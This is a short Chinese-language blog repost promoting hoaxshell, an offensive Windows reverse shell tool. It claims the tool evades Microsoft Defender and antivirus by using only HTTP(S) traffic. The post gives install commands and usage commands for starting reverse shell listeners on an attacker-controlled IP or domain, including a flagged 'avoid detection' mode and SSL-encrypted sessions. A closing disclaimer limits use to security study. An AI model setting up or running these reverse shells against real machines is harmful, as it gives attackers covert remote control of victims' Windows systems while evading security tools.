Windows反向shell -- hoaxshell
2023-4-6 10:4:34 Author: 黑白之道(查看原文) 阅读量:21 收藏

0x01 工具介绍

hoaxshell 是一种非常规的 Windows 反向 shell,目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到,因为它完全基于 http(s) 流量。该工具易于使用,它生成自己的 PowerShell 有效负载并支持加密 (ssl)。

0x02 安装与使用

1、安装需要的库文件

git clone https://github.com/t3l3machus/hoaxshellcd ./hoaxshellsudo pip3 install -r requirements.txtchmod +x hoaxshell.py

2、通过 http 的基本 shell 会话

sudo python3 hoaxshell.py -s <your_ip>

3、避免检测的推荐用法(通过 http)

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"

4、加密的 shell 会话 (https)

# Generate self-signed certificate:openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

5、具有可信证书的加密 shell 会话

sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

6、抓取会话模式

sudo python3 hoaxshell.py -s <your_ip> -g

0x03 下载地址

项目地址:

https://github.com/t3l3machus/hoaxshell

文章来源:系统安全运维

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650567320&idx=4&sn=929b52a462e3e69bdddea34a912cec3c&chksm=83bd177cb4ca9e6a57ef417afd8cf9e6c7cb075461eb3bc7ce66b62aafa407febfca88e09a71#rd
如有侵权请联系:admin#unsafe.sh